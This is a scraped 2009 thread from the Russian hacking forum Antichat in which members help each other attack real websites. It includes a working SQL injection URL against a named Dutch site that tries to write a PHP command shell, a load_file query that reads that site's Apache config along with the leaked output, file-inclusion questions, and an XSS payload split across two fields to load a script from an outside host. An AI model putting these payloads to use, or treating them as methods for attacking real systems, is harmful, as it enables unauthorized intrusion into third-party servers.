Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
04.12.2009, 10:05
|
|
Banned
Регистрация: 02.12.2008
Сообщений: 43
Провел на форуме:
131685
Репутация:
4
|
|
Сообщение от Ctacok
Полный путь к папке доступной из Интернета знаешь? (document_root)
Если знаешь, выполни запрос:
Вот только может быть чмоды помешаеют.
а терь по полочкам:
1- Есть шелл на сайте
2- сайт 1 на сервере
3- сервер Windows NT SERVER 5.2 build 3790
4- есть доступ к бд
5- бд мускуль5
6- Править файлы не могу
7- могу заливать свои
вопрос к тебе Ctacok, нахуя ему еще один шел?
дооо, возможно просто тс невпонятках что такае задний проход  ))
Последний раз редактировалось x[0]x; 04.12.2009 в 10:07..
|
|
|
04.12.2009, 10:14
|
|
Banned
Регистрация: 02.12.2008
Сообщений: 43
Провел на форуме:
131685
Репутация:
4
|
|
Сообщение от Strilo4ka
warlok прикольно, то что нужно ,а переменная $member. Для чего тогда она! ?
это вообще загадка....
$member = $row['name'];
епт.... иди на милворм, возьми пример, скачай уязвимую cms поставь на локалку, тести. а тк херли лясы точить?
|
|
|
|
04.12.2009, 11:17
|
|
Познающий
Регистрация: 01.08.2006
Сообщений: 35
Провел на форуме:
94171
Репутация:
3
|
|
Как можно использовать union select ... если запрос идет в UPDATE?
Тоесть например
PHP код:
UPDATE `news` SET `title` = ' _тут не фильтруемая переменная_ ', `date` = '' ...
thx. |
|
|
|
04.12.2009, 12:44
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 159
Провел на форуме:
721727
Репутация:
397
|
|
Сообщение от [R]eD
Как можно использовать union select ... если запрос идет в UPDATE?
Тоесть например
PHP код:
UPDATE `news` SET `title` = ' _тут не фильтруемая переменная_ ', `date` = '' ...
thx. что за бд?
Если Oracle там можно использовать конструкции по типу
Update table set column=(select user from dual)
Последний раз редактировалось [ DSU ]; 04.12.2009 в 12:47..
|
|
|
|
04.12.2009, 16:53
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
коротко:
File_Priv: Y
magic_quotes_off
Сервер:Apache/2.2.3 (Red Hat)
проблема: немогу раскрыть путь...
конструкция:
http://www.gsmtrack.nl/index.php?page[]=
недала нефига(
http://www.gsmtrack.nl/index.php?page=navi_merken&action=navigatie&id=-1+union+select+'%3C?php%20system($_GET['cmd']);%20?%3E'+into+outfile+'/var/www/'--
тут понятно тоже што нефига невыйшло так как путь.....
вообщем вся загвоздка в том што немогу путь раскрыть и (или) загрузить конфиги хотябы)...
|
|
|
|
04.12.2009, 17:17
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Код:
http://www.gsmtrack.nl/index.php?page=navi_merken&action=navigatie&id=-1+union+select+load_file('/etc/httpd/conf/httpd.conf')--
<VirtualHost 213.206.88.15:80>
ServerName www.gsmtrack.nl
ServerAdmin webmaster@gsmtrack.nl
DocumentRoot /opt/guide/www.gsmtrack.nl/HTML
|
|
|
|
04.12.2009, 17:39
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от Pashkela
Код:
http://www.gsmtrack.nl/index.php?page=navi_merken&action=navigatie&id=-1+union+select+load_file('/etc/httpd/conf/httpd.conf')--
<VirtualHost 213.206.88.15:80>
ServerName www.gsmtrack.nl
ServerAdmin webmaster@gsmtrack.nl
DocumentRoot /opt/guide/www.gsmtrack.nl/HTML
прикол) я пробовал так...
http://www.gsmtrack.nl/index.php?page=navi_merken&action=navigatie&id=-1+union+select+load_file('/etc/httpd/conf/httpd.conf')/*
и у меня нераскрылось) спасибо!
но к сожалению
/opt/guide/www.gsmtrack.nl/HTML закрыт на запись из веба и /var/www/html тоже...
ты путь по конфигу вычислил?
|
|
|
|
04.12.2009, 18:38
|
|
Познающий
Регистрация: 01.12.2008
Сообщений: 68
Провел на форуме:
484662
Репутация:
143
|
|
Вопрос такой:
Windows. Xampp, Mysql
Php-inj include($file.".php")
Инклудить пхп файлы (конфиги) никакого эффекта не дает - они интерпретируются.
Инклудить логи не возможно - они настолько велики, что страница не успевает "показаться" за 600 секунд. (даже error.log)
И сам вопрос - чтоб такое проинклудить?!
|
|
|
|
04.12.2009, 19:04
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от schwarze
Вопрос такой:
Windows. Xampp, Mysql
Php-inj include($file.".php")
Инклудить пхп файлы (конфиги) никакого эффекта не дает - они интерпретируются.
Инклудить логи не возможно - они настолько велики, что страница не успевает "показаться" за 600 секунд. (даже error.log)
И сам вопрос - чтоб такое проинклудить?!
Если allow_url_include, то
Если нет, то
Или автарки форумов, и тд...
Об этом уже писалось тут...
|
|
|
|
05.12.2009, 00:02
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
Есть 2 таблицы в бд с максимальным размером в 20 символов в каждой, вывод с них нефильтруеться т.е. если я в одну таблицу помешяю <script>alert('x')// а во 2 </script>
в итоге я получаю алерт а в сурсе я вижу такое
Код:
<script>alert('x')// (Password: </script>
мож нает какой вариант прокатит в этом случае, придумал разбивать скрипт и коментить левое выходит примерно так:
Код:
<script src="http:/* (Password: *///1.ru:73/1.js">
но скрипт то невыполняеться при таких условиях  |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для x[0]x](/avatars/avatar69745.gif){kind=avatar}
![Аватар для [R]eD](/avatars/avatar26157.gif){kind=avatar}
![Аватар для [ DSU ]](/avatars/avatar43637.gif){kind=avatar}
![Отправить сообщение для [ DSU ] с помощью ICQ](fusion/misc/im_icq.gif)
Похожие темы
Линейный вид
